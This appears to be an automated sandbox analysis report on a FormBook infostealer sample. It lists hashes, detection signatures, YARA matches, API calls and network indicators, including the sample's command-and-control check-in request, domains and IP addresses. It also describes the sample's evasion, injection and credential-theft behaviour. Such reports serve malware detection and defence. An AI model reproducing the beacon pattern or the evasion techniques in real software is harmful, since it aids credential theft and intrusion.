Windows Analysis Report
SecuriteInfo.com.CrypterX-gen.112.10371.exe

Overview

General Information

Sample name: SecuriteInfo.com.CrypterX-gen.112.10371.exe
Analysis ID: 1649304
MD5: 4994eae73d63e551a972e4718ece5980
SHA1: d83cc524f28a5fa5b81e58e0775c701b8efb1a21
SHA256: dfe034e5bb8d33f20fb79edeaaa7318cdef1c6063c378364711dc85da48dd712
Tags: exeuser-SecuriteInfoCom
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection
barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe ReversingLabs: Detection: 30%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.CrypterX-gen.112.10371.exe ReversingLabs: Detection: 30%
Yara detected FormBook
Source: Yara match File source: 5.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1947512095.0000000001860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2283171505.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2284140259.00000000006B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1647613467.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2284570033.0000000000750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2286306254.0000000002470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1949135596.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Neural Call Log Analysis: 99.9%
Uses 32bit PE files
Source: SecuriteInfo.com.CrypterX-gen.112.10371.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.CrypterX-gen.112.10371.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: eOQl.pdb source: SecuriteInfo.com.CrypterX-gen.112.10371.exe, ygTGgAEg.exe.0.dr
Source: Binary string: credwiz.pdb source: ygTGgAEg.exe, 0000000A.00000002.1947292597.0000000001468000.00000004.00000020.00020000.00000000.sdmp, nYPOiVPQBw.exe, 00000017.00000003.1883946633.0000000000825000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.CrypterX-gen.112.10371.exe, 00000005.00000002.1648366255.0000000001680000.00000040.00001000.00020000.00000000.sdmp, credwiz.exe, 00000018.00000002.2287550496.0000000004430000.00000040.00001000.00020000.00000000.sdmp, credwiz.exe, 00000018.00000002.2287550496.00000000045CE000.00000040.00001000.00020000.00000000.sdmp, credwiz.exe, 00000018.00000003.1946839032.00000000040CA000.00000004.00000020.00020000.00000000.sdmp, credwiz.exe, 00000018.00000003.1948941056.000000000427C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: SecuriteInfo.com.CrypterX-gen.112.10371.exe, SecuriteInfo.com.CrypterX-gen.112.10371.exe, 00000005.00000002.1648366255.0000000001680000.00000040.00001000.00020000.00000000.sdmp, credwiz.exe, credwiz.exe, 00000018.00000002.2287550496.0000000004430000.00000040.00001000.00020000.00000000.sdmp, credwiz.exe, 00000018.00000002.2287550496.00000000045CE000.00000040.00001000.00020000.00000000.sdmp, credwiz.exe, 00000018.00000003.1946839032.00000000040CA000.00000004.00000020.00020000.00000000.sdmp, credwiz.exe, 00000018.00000003.1948941056.000000000427C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: credwiz.pdbGCTL source: ygTGgAEg.exe, 0000000A.00000002.1947292597.0000000001468000.00000004.00000020.00020000.00000000.sdmp, nYPOiVPQBw.exe, 00000017.00000003.1883946633.0000000000825000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: eOQl.pdbSHA256 source: SecuriteInfo.com.CrypterX-gen.112.10371.exe, ygTGgAEg.exe.0.dr
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nYPOiVPQBw.exe, 00000017.00000002.2283799476.000000000031F000.00000002.00000001.01000000.0000000E.sdmp, nYPOiVPQBw.exe, 0000001B.00000002.2283165997.000000000031F000.00000002.00000001.01000000.0000000E.sdmp
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_0041CAC0 FindFirstFileW,FindNextFileW,FindClose, 24_2_0041CAC0
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 4x nop then xor eax, eax 24_2_00409E50

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49697 -> 52.223.13.41:80
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.104.28.238 185.104.28.238
Source: Joe Sandbox View IP Address: 52.223.13.41 52.223.13.41
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /1c80/?fLbDV=yn28GLR&TP=jxAkT8e6KDHyZbn18Ag8BcB1queL6RnbFcOD+sI/JoqnMFd34osgQ+1OANtGW2JP7u7J4i5LjdR/bWOR5ew7EzvABsG0vrjM9Fr6mhr8DKebau2Clw== HTTP/1.1Host: www.erbtechnique.danceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; K011 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic DNS traffic detected: DNS query: www.erbtechnique.dance
Source: global traffic DNS traffic detected: DNS query: www.nexohealth.online
Source: svchost.exe, 0000000C.00000002.2288608261.00000197F4200000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: qmgr.db.12.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.12.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.12.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.12.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.12.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.12.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.12.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: SecuriteInfo.com.CrypterX-gen.112.10371.exe, 00000000.00000002.1044217117.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, ygTGgAEg.exe, 00000006.00000002.1301297542.00000000027F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.21.dr String found in binary or memory: http://upx.sf.net
Source: credwiz.exe, 00000018.00000003.2143207475.0000000007638000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org?q=
Source: credwiz.exe, 00000018.00000003.2143207475.0000000007638000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: credwiz.exe, 00000018.00000003.2143207475.0000000007638000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: credwiz.exe, 00000018.00000003.2143207475.0000000007638000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: credwiz.exe, 00000018.00000003.2143207475.0000000007638000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: credwiz.exe, 00000018.00000003.2143207475.0000000007638000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: credwiz.exe, 00000018.00000003.2143207475.0000000007638000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: edb.log.12.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 0000000C.00000003.1204839167.00000197F4400000.00000004.00000800.00020000.00000000.sdmp, edb.log.12.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: credwiz.exe, 00000018.00000003.2143207475.0000000007638000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
Source: credwiz.exe, 00000018.00000002.2284749920.00000000007FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: credwiz.exe, 00000018.00000002.2284749920.00000000007FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480Z
Source: credwiz.exe, 00000018.00000002.2284749920.00000000007FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: credwiz.exe, 00000018.00000003.2133045728.0000000007565000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: credwiz.exe, 00000018.00000002.2284749920.00000000007FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: credwiz.exe, 00000018.00000002.2284749920.00000000007FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: credwiz.exe, 00000018.00000002.2284749920.00000000007DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033V
Source: credwiz.exe, 00000018.00000002.2284749920.00000000007DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: credwiz.exe, 00000018.00000002.2284749920.00000000007FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: credwiz.exe, 00000018.00000002.2284749920.00000000007FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: credwiz.exe, 00000018.00000003.2143207475.0000000007638000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/v20Y&
Source: credwiz.exe, 00000018.00000003.2143207475.0000000007638000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 5.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1947512095.0000000001860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2283171505.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2284140259.00000000006B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1647613467.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2284570033.0000000000750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2286306254.0000000002470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1949135596.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0042CC23 NtClose, 5_2_0042CC23
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_016F2DF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F4340 NtSetContextThread, 5_2_016F4340
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F4650 NtSuspendThread, 5_2_016F4650
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2B60 NtClose, 5_2_016F2B60
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2BE0 NtQueryValueKey, 5_2_016F2BE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2BF0 NtAllocateVirtualMemory, 5_2_016F2BF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2BA0 NtEnumerateValueKey, 5_2_016F2BA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2B80 NtQueryInformationFile, 5_2_016F2B80
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2AF0 NtWriteFile, 5_2_016F2AF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2AD0 NtReadFile, 5_2_016F2AD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2AB0 NtWaitForSingleObject, 5_2_016F2AB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2D30 NtUnmapViewOfSection, 5_2_016F2D30
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2D00 NtSetInformationFile, 5_2_016F2D00
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2D10 NtMapViewOfSection, 5_2_016F2D10
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2DD0 NtDelayExecution, 5_2_016F2DD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2DB0 NtEnumerateKey, 5_2_016F2DB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2C60 NtCreateKey, 5_2_016F2C60
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2C70 NtFreeVirtualMemory, 5_2_016F2C70
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2C00 NtQueryInformationProcess, 5_2_016F2C00
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2CF0 NtOpenProcess, 5_2_016F2CF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2CC0 NtQueryVirtualMemory, 5_2_016F2CC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2CA0 NtQueryInformationToken, 5_2_016F2CA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2F60 NtCreateProcessEx, 5_2_016F2F60
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2F30 NtCreateSection, 5_2_016F2F30
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2FE0 NtCreateFile, 5_2_016F2FE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2FA0 NtQuerySection, 5_2_016F2FA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2FB0 NtResumeThread, 5_2_016F2FB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2F90 NtProtectVirtualMemory, 5_2_016F2F90
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2E30 NtWriteVirtualMemory, 5_2_016F2E30
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2EE0 NtQueueApcThread, 5_2_016F2EE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2EA0 NtAdjustPrivilegesToken, 5_2_016F2EA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F2E80 NtReadVirtualMemory, 5_2_016F2E80
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F3010 NtOpenDirectoryObject, 5_2_016F3010
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F3090 NtSetValueKey, 5_2_016F3090
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F35C0 NtCreateMutant, 5_2_016F35C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F39B0 NtGetContextThread, 5_2_016F39B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F3D70 NtOpenThread, 5_2_016F3D70
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016F3D10 NtOpenProcessToken, 5_2_016F3D10
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A4650 NtSuspendThread,LdrInitializeThunk, 24_2_044A4650
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A4340 NtSetContextThread,LdrInitializeThunk, 24_2_044A4340
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2C60 NtCreateKey,LdrInitializeThunk, 24_2_044A2C60
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2C70 NtFreeVirtualMemory,LdrInitializeThunk, 24_2_044A2C70
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2CA0 NtQueryInformationToken,LdrInitializeThunk, 24_2_044A2CA0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2D10 NtMapViewOfSection,LdrInitializeThunk, 24_2_044A2D10
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2D30 NtUnmapViewOfSection,LdrInitializeThunk, 24_2_044A2D30
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2DD0 NtDelayExecution,LdrInitializeThunk, 24_2_044A2DD0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2DF0 NtQuerySystemInformation,LdrInitializeThunk, 24_2_044A2DF0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2EE0 NtQueueApcThread,LdrInitializeThunk, 24_2_044A2EE0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2E80 NtReadVirtualMemory,LdrInitializeThunk, 24_2_044A2E80
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2F30 NtCreateSection,LdrInitializeThunk, 24_2_044A2F30
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2FE0 NtCreateFile,LdrInitializeThunk, 24_2_044A2FE0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2FB0 NtResumeThread,LdrInitializeThunk, 24_2_044A2FB0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2AD0 NtReadFile,LdrInitializeThunk, 24_2_044A2AD0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2AF0 NtWriteFile,LdrInitializeThunk, 24_2_044A2AF0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2B60 NtClose,LdrInitializeThunk, 24_2_044A2B60
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2BE0 NtQueryValueKey,LdrInitializeThunk, 24_2_044A2BE0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 24_2_044A2BF0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2BA0 NtEnumerateValueKey,LdrInitializeThunk, 24_2_044A2BA0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A35C0 NtCreateMutant,LdrInitializeThunk, 24_2_044A35C0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A39B0 NtGetContextThread,LdrInitializeThunk, 24_2_044A39B0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2C00 NtQueryInformationProcess, 24_2_044A2C00
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2CC0 NtQueryVirtualMemory, 24_2_044A2CC0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2CF0 NtOpenProcess, 24_2_044A2CF0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2D00 NtSetInformationFile, 24_2_044A2D00
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2DB0 NtEnumerateKey, 24_2_044A2DB0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2E30 NtWriteVirtualMemory, 24_2_044A2E30
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2EA0 NtAdjustPrivilegesToken, 24_2_044A2EA0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2F60 NtCreateProcessEx, 24_2_044A2F60
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2F90 NtProtectVirtualMemory, 24_2_044A2F90
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2FA0 NtQuerySection, 24_2_044A2FA0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2AB0 NtWaitForSingleObject, 24_2_044A2AB0
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A2B80 NtQueryInformationFile, 24_2_044A2B80
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A3010 NtOpenDirectoryObject, 24_2_044A3010
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A3090 NtSetValueKey, 24_2_044A3090
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A3D70 NtOpenThread, 24_2_044A3D70
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_044A3D10 NtOpenProcessToken, 24_2_044A3D10
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_00429510 NtCreateFile, 24_2_00429510
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_00429670 NtReadFile, 24_2_00429670
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_00429760 NtDeleteFile, 24_2_00429760
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_00429800 NtClose, 24_2_00429800
Source: C:\Windows\SysWOW64\credwiz.exe Code function: 24_2_00429950 NtAllocateVirtualMemory, 24_2_00429950
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 0_2_02C9456C 0_2_02C9456C
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 0_2_02C94D90 0_2_02C94D90
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 0_2_02C9D2BC 0_2_02C9D2BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 0_2_073A0788 0_2_073A0788
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 0_2_073A3890 0_2_073A3890
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_00410853 5_2_00410853
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0040E859 5_2_0040E859
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_00402860 5_2_00402860
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0040E863 5_2_0040E863
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_004010E0 5_2_004010E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0042F1C3 5_2_0042F1C3
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_004031A0 5_2_004031A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0040E9A7 5_2_0040E9A7
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0040E9B3 5_2_0040E9B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_00401BC8 5_2_00401BC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_00402C70 5_2_00402C70
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_00410630 5_2_00410630
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_00410633 5_2_00410633
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_00416F93 5_2_00416F93
